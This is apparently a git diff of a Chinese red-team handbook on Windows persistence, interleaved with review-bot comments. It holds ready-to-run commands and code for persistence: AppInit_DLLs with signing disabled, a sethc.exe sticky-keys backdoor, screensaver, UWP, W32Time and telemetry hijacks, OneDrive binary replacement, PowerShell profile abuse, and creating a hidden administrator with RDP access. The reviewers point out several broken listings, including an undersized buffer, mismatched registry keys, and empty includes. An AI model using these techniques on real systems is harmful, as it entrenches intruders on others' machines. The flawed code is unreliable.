HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run | +| HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | +| HKLM\System\CurrentControlSet\Control\Lsa\ | +| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages | +| HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages | +| HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors | +| HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors | +| HKLM\System\CurrentControlSet\Control\Session Manager\KnownDlls | +| HKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\ | +| HKLM\System\CurrentControlSet\Services | +| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries | +| HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol\_Catalog9\Catalog\_Entries64 | +| HKU\*\software\microsoft\windows\currentversion\explorer\user shell folders\startup | + diff --git a/persistence/uncatelogued/README.md b/persistence/uncatelogued/README.md new file mode 100644 index 0000000..08822ba --- /dev/null +++ b/persistence/uncatelogued/README.md @@ -0,0 +1,2 @@ +# 未分类 + diff --git a/persistence/uncatelogued/addmonitor.md b/persistence/uncatelogued/addmonitor.md new file mode 100644 index 0000000..8029141 --- /dev/null +++ b/persistence/uncatelogued/addmonitor.md 
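Review bot: Several entries in the registry.md table are not valid key paths as written: the four `...\Classes\CLSID{083863F1-...}\Instance` / `CLSID{7ED96837-...}\Instance` rows are missing the `\` between `CLSID` and the GUID (probably lost to Markdown escaping, since rows like `Protocol\_Catalog9` show the escaping the renderer expects), `HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Windows` lacks the space in `Windows NT`, `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad` is listed twice, and the `Lsa\` and `TimeProviders\` rows carry a trailing backslash. Since this table is exactly the list a defender would feed into registry-monitoring rules, each row should be the precise key path. The same missing space in `Windows NT` appears in all three `TelemetryController` commands in windows-telemetry.md.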
@@ -0,0 +1,34 @@ +# AddMonitor + +AddMonitor\(\)函数,可用于安装本地端口监视器并配置连接、数据和监视器文件。此函数能够将DLL注入spoolsv.exe进程,以在系统上实现持久性。 + +C++ + +```cpp +#include "stdafx.h" +#include "Windows.h" +int main() { + MONITOR_INFO_2 monitorInfo; + TCHAR env[12] = TEXT("Windows x64"); + TCHAR name[12] = TEXT("evilMonitor"); + TCHAR dll[12] = TEXT("qwqdanchun.dll"); + monitorInfo.pName = name; + monitorInfo.pEnvironment = env; + monitorInfo.pDLLName = dll; + AddMonitor(NULL, 2, (LPBYTE)&monitorInfo); + return 0; +} +//Compile to monitor.exe and move your evil DLL to %systemroot% then run the compiled monitor.exe +``` + +```text +#Then run this command +reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /t REG_SZ /d "qwqdanchun.dll" /f +``` + +参考文章: + +{% embed url="https://www.ired.team/offensive-security/persistence/t1013-addmonitor" caption="" %} + +{% embed url="https://docs.microsoft.com/en-us/windows/win32/printdocs/addmonitor" caption="" %} + diff --git a/persistence/uncatelogued/appinit-dlls-inject.md b/persistence/uncatelogued/appinit-dlls-inject.md new file mode 100644 index 0000000..b773268 --- /dev/null +++ b/persistence/uncatelogued/appinit-dlls-inject.md 
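Review bot: The AddMonitor example in addmonitor.md is internally inconsistent: the C++ registers a monitor named `evilMonitor`, while the follow-up `reg add` writes the `Driver` value under `...\Print\Monitors\Pentestlab`, so the two steps refer to different monitor keys. Also `TCHAR dll[12] = TEXT("qwqdanchun.dll")` declares a 12-element buffer for a 14-character name plus terminator, which a C++ compiler rejects as an over-long initializer, so the listing does not build as shown. It would help readers on the defensive side to state that the registered DLL is loaded by spoolsv.exe on the next spooler start, which is why `Print\Monitors` is in this book's registry.md list.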
@@ -0,0 +1,14 @@
+# AppInit\_DLLs注入
+
+User32.dll被加载到进程时,会加载”HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows”中Appinit\_Dlls的值,修改其值可以使其加载恶意的脚本
+
+```text
+#Win10
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f
+#others
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Appinit_Dlls /t REG_SZ /d "c:\Temp\qwqdanchun.dll" /f
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t REG_DWORD /d 0x1 /f
+reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs /t REG_DWORD /d 0x0 /f
+```
+
diff --git a/persistence/uncatelogued/bios.md b/persistence/uncatelogued/bios.md
new file mode 100644
index 0000000..4d161f4
--- /dev/null
+++ b/persistence/uncatelogued/bios.md
@@ -0,0 +1,12 @@
+# Bios
+
+现有产品:
+
+{% embed url="https://www.absolute.com/platform/persistence/\#" caption="" %}
+
+参考文章:
+
+{% embed url="https://securelist.com/absolute-computrace-revisited/58278/" caption="" %}
+
+{% embed url="https://bartblaze.blogspot.com/2014/11/thoughts-on-absolute-computrace.html" caption="" %}
+
diff --git a/persistence/uncatelogued/command-processor.md b/persistence/uncatelogued/command-processor.md
new file mode 100644
index 0000000..574c9f6
--- /dev/null
+++ b/persistence/uncatelogued/command-processor.md
@@ -0,0 +1,10 @@
+# cmd启动劫持
+
+在cmd启动时会去注册表“HKEY\_LOCAL\_MACHINE\SOFTWARE\Microsoft\Command Processor”中查看是否有AutoRun的健值,如果有则会运行其中的内容
+
+命令行:
+
+```text
+reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "c:\Temp\qwqdanchun.exe" /f
+```
+
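Review bot: The description in appinit-dlls-inject.md says the `Appinit_Dlls` value makes user32.dll load a malicious `脚本`, but the value is a list of DLL paths loaded into every process that links user32.dll, not a script, so `脚本` should read `DLL`. The page should also note that on Windows 8 and later the AppInit_DLLs mechanism is disabled outright when Secure Boot is enabled, which is why the `#Win10` block is unlikely to take effect on a default-configured machine and why `LoadAppInit_DLLs` and `RequireSignedAppInit_DLLs` under that key are values to monitor rather than assume.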
diff --git a/persistence/uncatelogued/hijack-update-program.md b/persistence/uncatelogued/hijack-update-program.md new file mode 100644 index 0000000..6176f2f --- /dev/null +++ b/persistence/uncatelogued/hijack-update-program.md @@ -0,0 +1,10 @@ +# 劫持更新程序 + +通过修改DNS,ARP欺骗等方法可以劫持程序查找更新的流量。 + +有很多程序启动时会连接网络并检查更新,可以借此实现持久化。 + +参考项目: + +{% embed url="https://github.com/infobyte/evilgrade" caption="" %} + diff --git a/persistence/uncatelogued/laps.md b/persistence/uncatelogued/laps.md new file mode 100644 index 0000000..1631986 --- /dev/null +++ b/persistence/uncatelogued/laps.md @@ -0,0 +1,12 @@ +# 利用LAPS + +“本地管理员密码解决方案”(LAPS)在Active Directory(AD)中提供了机密/密码的集中存储。组织的域管理员可以确定哪些用户有权读取密码。([https://docs.microsoft.com/en-us/previous-versions/mt227395\(v=msdn.10\)?redirectedfrom=MSDN](https://docs.microsoft.com/en-us/previous-versions/mt227395%28v=msdn.10%29?redirectedfrom=MSDN) ) + +可以通过对部署了此项目的主机上LAPS的一些修改实现持久化。 + +参考文章: + +{% embed url="https://rastamouse.me/blog/laps-pt1/" caption="" %} + +{% embed url="https://rastamouse.me/blog/laps-pt2/" caption="" %} + diff --git a/persistence/uncatelogued/powershell-profile.md b/persistence/uncatelogued/powershell-profile.md new file mode 100644 index 0000000..5163d8a --- /dev/null +++ b/persistence/uncatelogued/powershell-profile.md 
@@ -0,0 +1,31 @@ +# 滥用POWERSHELL配置文件 + +PowerShell启动时会执行配置文件的内容。 + +Powershell: + +```text +echo $profile +Test-Path $profile +New-Item -Path $profile -Type File –Force +$string = 'Start-Process "C:\Temp\qwqdanchun.exe"' +$string | Out-File -FilePath "%HOMEPATH%\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1" -Append +``` + +注:Powershell默认配置文件有多个,按照从上到下的顺序优先级从高到低 + +| Description | Path | +| :--- | :--- | +| All Users, All Hosts | $PSHOME\Profile.ps1 | +| All Users, Current Host | $PSHOME\Microsoft.PowerShell\_profile.ps1 | +| Current User, All Hosts | $Home\[My \]Documents\PowerShell\Profile.ps1 | +| Current user, Current Host | $Home\[My \]Documents\PowerShell\Microsoft.PowerShell\_profile.ps1 | + +参考文章: + +{% embed url="https://github.com/enigma0x3/PowershellProfile" caption="" %} + +{% embed url="https://enigma0x3.net/2014/06/16/abusing-powershell-profiles/" caption="" %} + +{% embed url="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about\_profiles?view=powershell-7.1&viewFallbackFrom=powershell-6" caption="" %} + diff --git a/persistence/uncatelogued/replace-file.md b/persistence/uncatelogued/replace-file.md new file mode 100644 index 0000000..050a22d --- /dev/null +++ b/persistence/uncatelogued/replace-file.md @@ -0,0 +1,19 @@ +# 替换文件 + +这是一种比较无脑,但是某种程度上还挺好用的方法。 + +简单的说就是替换现有的自启动文件,最好的例子大概就是Onedrive了。不需要管理员权限就可以结束进程,并且目录可写,Win10默认会自启动。 + +简单利用示例: + +```text +taskkill /f /im OneDrive.exe +copy c:\Temp\qwqdanchun.exe %LocalAppData%\Microsoft\OneDrive\OneDrive.exe +``` + +另外,也可以修改浏览器等的快捷方式来实现被动启动的效果。具体实现将在后文LNK文件格式处详细讨论。 + +一例修改现有应用文件的攻击: + +{% embed url="https://blog.trendmicro.com/trendlabs-security-intelligence/attack-gains-foothold-against-east-asian-government-through-auto-start/" caption="" %} + diff --git a/persistence/uncatelogued/screen-save.md b/persistence/uncatelogued/screen-save.md new file mode 100644 index 0000000..b41c0ee --- /dev/null +++ b/persistence/uncatelogued/screen-save.md 
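Review bot: The profile-path table in powershell-profile.md lists the PowerShell 7 locations (`$PSHOME\Profile.ps1`, `$Home\[My \]Documents\PowerShell\...`) while the example writes to the Windows PowerShell 5.1 path (`...\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1`), and `%HOMEPATH%` is cmd.exe syntax that `Out-File` will not expand, so the example and the table do not describe the same file. Stating which host each path belongs to, and reusing the `$profile` variable the script already echoes, would make them consistent. From a monitoring standpoint the page should say that both hosts' profile locations are the files to watch for newly created or modified `*profile.ps1`.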
@@ -0,0 +1,20 @@
+# 屏幕保护
+
+屏幕保护是Windows的一个功能,使计算机屏幕可以在一段时间不活动后播放动画。
+修改屏保加载的程序可以实现权限维持的效果。
+
+命令行:
+
+```text
+#To make sure the SCRNSAVE is on
+reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d "1" /f
+reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d "0" /f
+reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d "60" /f
+#For EXE file
+reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe
+New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe'
+#For SCR file
+reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Temp\qwqdanchun.exe
+New-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name 'SCRNSAVE.EXE' -Value 'C:\Temp\qwqdanchun.exe'
+```
+
diff --git a/persistence/uncatelogued/sdb.md b/persistence/uncatelogued/sdb.md
new file mode 100644
index 0000000..413ebb1
--- /dev/null
+++ b/persistence/uncatelogued/sdb.md
@@ -0,0 +1,10 @@
+# SDB文件
+
+Win10 已不适用
+
+参考文章:
+
+{% embed url="https://pentestlab.blog/2019/12/16/persistence-application-shimming/" caption="" %}
+
+{% embed url="https://github.com/evil-e/sdb-explorer" caption="" %}
+
diff --git a/persistence/uncatelogued/sethc.exe.md b/persistence/uncatelogued/sethc.exe.md
new file mode 100644
index 0000000..d3a584a
--- /dev/null
+++ b/persistence/uncatelogued/sethc.exe.md
@@ -0,0 +1,15 @@
+# 粘滞键
+
+老生常谈的东西了,直接放利用代码:
+
+```text
+#Before Windows Vista
+takeown /f sethc.* /a /r /d y
+cacls sethc.exe /T /E /G administrators:F
+copy /y cmd.exe sethc.exe
+
+#Suggest you don't use this after Windows Vista.
+#If you really like it,try this.
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
+```
+
diff --git a/persistence/uncatelogued/ssp-dll.md b/persistence/uncatelogued/ssp-dll.md
new file mode 100644
index 0000000..0f0266a
--- /dev/null
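Review bot: In screen-save.md the `#For SCR file` block is a byte-for-byte copy of the `#For EXE file` block above it — both set `SCRNSAVE.EXE` to `C:\Temp\qwqdanchun.exe` — so the SCR case the comment promises is never actually shown; either drop the duplicate or make the second block differ in what it demonstrates. The page would also be more useful on the defensive side if it named `ScreenSaveActive`, `ScreenSaveTimeOut` and `SCRNSAVE.EXE` under `HKEY_CURRENT_USER\Control Panel\Desktop` as the values to baseline, since outside Group Policy they rarely change in normal use.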
+++ b/persistence/uncatelogued/ssp-dll.md @@ -0,0 +1,10 @@ +# 注册SSP DLL + +## SSP + +安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。LSASS进程在Windows启动期间会加载SSP DLL。 + +注:这种方法一般用来Dump内存并获取密码,只是拿来做权限维持实在是大材小用了,迄今为止也只听说了Lazarus这个朝鲜APT组织这么干过。。。([https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/)](https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical/%EF%BC%89) + +再注:找不到现有的POC,自己也懒得写了,所幸 [https://github.com/PowerShellMafia/PowerSploit](https://github.com/PowerShellMafia/PowerSploit) 里有一个”Install-SSP”方法,有兴趣的同学可以去看看。至于注入SSP DLL的其他相关内容会在Mimikatz部分专门讨论。 + diff --git a/persistence/uncatelogued/uwp.md b/persistence/uncatelogued/uwp.md new file mode 100644 index 0000000..8c0c9b3 --- /dev/null +++ b/persistence/uncatelogued/uwp.md 
@@ -0,0 +1,25 @@
+# UWP
+
+使用调试器选项的Appx/UWP应用程序可以用来做权限维持。
+
+Windows系统在启动时会自动启动若干UWP应用,利用其注册表路径或者调试配置可以加载自己的程序,以实现权限维持。
+
+示例中展示了如何劫持小娜和人脉,在实际使用时,要自行修改路径以适配APP版本。
+
+命令行:
+
+```text
+#First way for Cortana
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Temp\qwqdanchun.exe"
+#Second way for Cortana
+reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.7.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
+#First way for People
+reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Temp\qwqdanchun.exe"
+#Second way for People
+reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Temp\qwqdanchun.exe"
+```
+
+参考文章:
+
+{% embed url="https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/" caption="" %}
+
diff --git a/persistence/uncatelogued/w32time.md b/persistence/uncatelogued/w32time.md
new file mode 100644
index 0000000..993ac88
--- /dev/null
+++ b/persistence/uncatelogued/w32time.md
@@ -0,0 +1,205 @@ +# W32Time + +Windows启动期间将启动服务W32Time并加载w32time.dll。 + +可以通过修改如下两个注册表地址实现加载dll + +```text +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /v DllName /t REG_SZ /d "C:\Temp\qwqdanchun.dll" /f +sc.exe stop w32time +sc.exe start w32time +``` + +Scott Lundgren使用c++开发了gametime时间提供程序。可以使用此DLL来向操作系统注册新的时间提供者。这样可以避免滥用现有的Windows时间提供程序, + +C++: + +```cpp +#include +#include +#include +#define GAMETIME_SVC_KEY_NAME L"System\\CurrentControlSet\\Services\\W32Time\\TimeProviders\\GameTime" +static WCHAR g_wzModule[MAX_PATH] = { L'\0' }; +BOOL WINAPI DllMain( + _In_ HINSTANCE hInstDll, + _In_ DWORD fdwReason, + _In_ LPVOID lpvReserved +) +{ + UNREFERENCED_PARAMETER(hInstDll); + UNREFERENCED_PARAMETER(lpvReserved); + switch (fdwReason) + { + case DLL_PROCESS_ATTACH: + (void)GetModuleFileNameW(hInstDll, g_wzModule, MAX_PATH); + break; + } + return (TRUE); +} +void WINAPI OutputError( + _In_ PWCHAR pwzMessage, + _In_ DWORD dwError +) +{ + WCHAR wzError[1024] = { L'\0' }; + if (SUCCEEDED(StringCchPrintfW(wzError, 1024, L"ERROR: [0x%0.8x] [%d] %s", dwError, dwError, pwzMessage))) + { + OutputDebugStringW(wzError); + } +} +/* + * + */ +HRESULT __stdcall TimeProvOpen( + _In_ WCHAR *wszName, + _In_ TimeProvSysCallbacks *pSysCallbacks, + _Out_ TimeProvHandle *phTimeProv +) +{ + UNREFERENCED_PARAMETER(pSysCallbacks); + UNREFERENCED_PARAMETER(phTimeProv); + OutputDebugStringW(wszName); + return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE)); +} +/* + * + */ +HRESULT __stdcall TimeProvCommand( + _In_ TimeProvHandle hTimeProv, + _In_ TimeProvCmd eCmd, + _In_ PVOID pvArgs +) +{ + UNREFERENCED_PARAMETER(hTimeProv); + UNREFERENCED_PARAMETER(eCmd); + UNREFERENCED_PARAMETER(pvArgs); + return (HRESULT_FROM_WIN32(ERROR_NOT_CAPABLE)); +} +/* + * + */ +HRESULT __stdcall TimeProvClose( + _In_ 
TimeProvHandle hTimeProv +) +{ + UNREFERENCED_PARAMETER(hTimeProv); + return (S_OK); +} +/* + * Register + * + * This is an exported helper function to register the GameTime time provider + * + * This is not transacted; failures may leave the registry in an inconsistent state + * + */ +void CALLBACK Register( + _In_ HWND hWnd, + _In_ HINSTANCE hInst, + _In_ LPSTR pwzCmdLine, + _In_ int nCmdShow) +{ + HKEY hkTimeProvider = NULL; + LONG nRet; + DWORD dwOne = 1; + UNREFERENCED_PARAMETER(hWnd); + UNREFERENCED_PARAMETER(hInst); + UNREFERENCED_PARAMETER(pwzCmdLine); + UNREFERENCED_PARAMETER(nCmdShow); + OutputDebugStringW(L"Register\n"); + /* + * Time providers manually register with the Win32 Time Service + * See https://msdn.microsoft.com/en-us/library/windows/desktop/ms724869(v=vs.85).aspx + * + * Begin by creating the key for the provider + */ + nRet = RegCreateKeyExW(HKEY_LOCAL_MACHINE, + GAMETIME_SVC_KEY_NAME, + 0, + NULL, + 0, + KEY_ALL_ACCESS, + NULL, + &hkTimeProvider, + NULL); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } + /* + * Populate the three required time provider configuration values + * The three required values are: DllName, Enabled, InputProvider + */ + nRet = RegSetValueExW(hkTimeProvider, + L"DllName", + 0, + REG_SZ, + (LPBYTE)g_wzModule, + (DWORD)wcslen(g_wzModule)*sizeof(WCHAR)+sizeof(WCHAR)); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } + nRet = RegSetValueExW(hkTimeProvider, + L"Enabled", + 0, + REG_DWORD, + (LPBYTE)&dwOne, + sizeof(dwOne)); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } + nRet = RegSetValueExW(hkTimeProvider, + L"InputProvider", + 0, + REG_DWORD, + (LPBYTE)&dwOne, + sizeof(dwOne)); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegCreateKeyExW failed", nRet); + goto ErrorExit; + } +ErrorExit: + if (NULL != hkTimeProvider) + { + 
(void)RegCloseKey(hkTimeProvider); + } + return; +} +void CALLBACK Deregister( + _In_ HWND hWnd, + _In_ HINSTANCE hInst, + _In_ LPSTR pwzCmdLine, + _In_ int nCmdShow) +{ + long nRet; + UNREFERENCED_PARAMETER(hWnd); + UNREFERENCED_PARAMETER(hInst); + UNREFERENCED_PARAMETER(pwzCmdLine); + UNREFERENCED_PARAMETER(nCmdShow); + OutputDebugStringW(L"Unregister\n"); + nRet = RegDeleteKeyW(HKEY_LOCAL_MACHINE, GAMETIME_SVC_KEY_NAME); + if (ERROR_SUCCESS != nRet) + { + OutputError(L"RegDeleteKeyW failed!", nRet); + goto ErrorExit; + } +ErrorExit: + return; +} +``` + +参考文章: + +{% embed url="https://docs.microsoft.com/en-gb/windows/win32/sysinfo/time-provider" caption="" %} + +{% embed url="https://github.com/scottlundgren/w32time" caption="" %} + +{% embed url="https://pentestlab.blog/2019/10/22/persistence-time-providers/" caption="" %} + diff --git a/persistence/uncatelogued/waitfor.md b/persistence/uncatelogued/waitfor.md new file mode 100644 index 0000000..882ee46 --- /dev/null +++ b/persistence/uncatelogued/waitfor.md @@ -0,0 +1,19 @@ +# Waitfor + +是存在于Windows上,用来同步网络中计算机,可以发送或等待系统上的信号的程序,默认位置在“C:\Windows\System32\waitfor.exe” + +```text +#Target computer +waitfor persist && C:\Temp\qwqdanchun.exe +#Use this to trigger +waitfor /s 127.0.0.1 /si persist +``` + +参考文章: + +{% embed url="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc731613\(v=ws.11\)?redirectedfrom=MSDN" caption="" %} + +{% embed url="https://github.com/3gstudent/Waitfor-Persistence" caption="" %} + +{% embed url="https://twitter.com/danielhbohannon/status/872258924078092288" caption="" %} + diff --git a/persistence/uncatelogued/windows-telemetry.md b/persistence/uncatelogued/windows-telemetry.md new file mode 100644 index 0000000..7e9f32e --- /dev/null +++ b/persistence/uncatelogued/windows-telemetry.md 
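Review bot: The three `#include` lines at the top of the C++ listing in w32time.md are empty — the header names were most likely stripped as HTML tags by the GitBook renderer — so the listing does not compile as shown; the names need to be restored from the referenced scottlundgren/w32time repository and escaped so the renderer leaves them alone. Separately, all three `RegSetValueExW` failure branches in `Register` report `L"RegCreateKeyExW failed"`, a copy-paste slip that mislabels the failing call in the debug output, and `Deregister` logs `L"Unregister\n"` although the function is named Deregister. The page could also point out that the provider lands under `HKLM\System\CurrentControlSet\Services\W32Time\TimeProviders`, which this book's registry.md already lists as an autostart location to monitor.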
@@ -0,0 +1,20 @@
+# Windows Telemetry
+
+在Windows 7之后的Windows操作系统都存在这一个监测数据收集服务,如果加入了Microsoft用户反馈改善计划,该服务就会监测系统异常并收集反馈到微软。
+
+命令行:
+
+```text
+REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun"
+REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Command /t REG_SZ /d "C:\Temp\qwqdanchun.exe" /f
+REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AppCompatFlags\TelemetryController\qwqdanchun" /v Nightly /t REG_DWORD /d 1 /f
+```
+
+原理:
+
+{% embed url="https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/" caption="" %}
+
+利用代码:
+
+{% embed url="https://github.com/360-Linton-Lab/Telemetry" caption="" %}
+
diff --git a/persistence/user/README.md b/persistence/user/README.md
new file mode 100644
index 0000000..426b893
--- /dev/null
+++ b/persistence/user/README.md
@@ -0,0 +1,2 @@
+# 用户账户
+
diff --git a/persistence/user/add-user.md b/persistence/user/add-user.md
new file mode 100644
index 0000000..8eeef40
--- /dev/null
+++ b/persistence/user/add-user.md
@@ -0,0 +1,176 @@
+# 新建用户
+
+新建用户并添加管理员及远程访问权限
+
+命令行:
+
+```text
+net user qwqdanchun password /add /y
+net localgroup administrators qwqdanchun /add
+net localgroup "remote desktop users" qwqdanchun /add
+```
+
+Powershell:
+
+```text
+set wsnetwork=CreateObject("WSCRIPT.NETWORK")
+os="WinNT://"&wsnetwork.ComputerName
+Set ob=GetObject(os)
+Set oe=GetObject(os&"/Administrators,group")
+Set od=ob.Create("user","qwqdanchun")
+od.SetPassword "password"
+od.SetInfo
+Set of=GetObject(os&"/admin",user)
+oe.add os&"/admin"
+```
+
+Powershell(另一个版本):
+
+```text
+$Username = "qwqdanchun"
+$P = "password"
+$Password = ConvertTo-SecureString $P -AsPlainText -Force
+New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
+Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"
+```
+
+c\#(使用系统 API 函数):
+
+```csharp
+using System;
+using System.Runtime.InteropServices;
+namespace Bypass360Add
+{
+ public static class BypassUAC_csharp
+ {
+ [DllImport("kernel32.dll")]
+ static extern void ExitProcess(uint uExitCode);
+ public static void Main(string[] args)
+ {
+ LocalGroupUserHelper local = new LocalGroupUserHelper();
+ string username = "qwqdanchun";
+ string password = "password";
+ string groupname = "Administrators";
+ local.AddUser(null, username, password, null);
+ local.GroupAddMembers(null, groupname, username);
+ ExitProcess(1);
+ }
+ }
+ public class LocalGroupUserHelper
+ {
+ [DllImport("Netapi32.dll")]
+ extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
+ [DllImport("Netapi32.dll")]
+ extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
+ int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ public struct LOCALGROUP_MEMBERS_INFO_3
+ {
+ public string domainandname; //
//lgrmi3_domainandname
+ }
+ [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+ public struct USER_INFO_1
+ {
+ public string usri1_name;
+ public string usri1_password;
+ public int usri1_password_age;
+ public int usri1_priv;
+ public string usri1_home_dir;
+ public string comment;
+ public int usri1_flags;
+ public string usri1_script_path;
+ }
+ public void AddUser(string serverName, string userName, string password, string strComment)
+ {
+ USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
+ NewUser.usri1_name = userName; // Allocates the username
+ NewUser.usri1_password = password; // allocates the password
+ NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
+ NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
+ NewUser.comment = strComment; // Comment on the User
+ NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
+ if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
+ {
+ Console.WriteLine("Error Adding User");
+ }
+ }
+ public void GroupAddMembers(string serverName, string groupName, string userName)
+ {
+ LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
+ NewMember.domainandname = userName;
+ if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
+ {
+ Console.WriteLine("Error Adding Group Member");
+ }
+ }
+ }
+}
+```
+
+c++\(重写AddUser\):
+
+```cpp
+#include "ApiAddUser.h"
+
+
+
+int wmain(int argc, wchar_t* argv[])
+{
+ UNICODE_STRING UserName;
+ UNICODE_STRING PassWord;
+ HANDLE ServerHandle = NULL;
+ HANDLE DomainHandle = NULL;
+ HANDLE UserHandle = NULL;
+ ULONG GrantedAccess;
+ ULONG RelativeId;
+ NTSTATUS Status = NULL;
+ HMODULE hSamlib = NULL;
+ HMODULE hNtdll = NULL;
+ HMODULE hNetapi32 = NULL;
+ LSA_HANDLE hPolicy = NULL;
+ LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
+ PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
+ USER_ALL_INFORMATION uai = { 0 };
+
+
+ hSamlib =
LoadLibraryA("samlib.dll");
+ hNtdll = LoadLibraryA("ntdll");
+
+ pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
+ pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
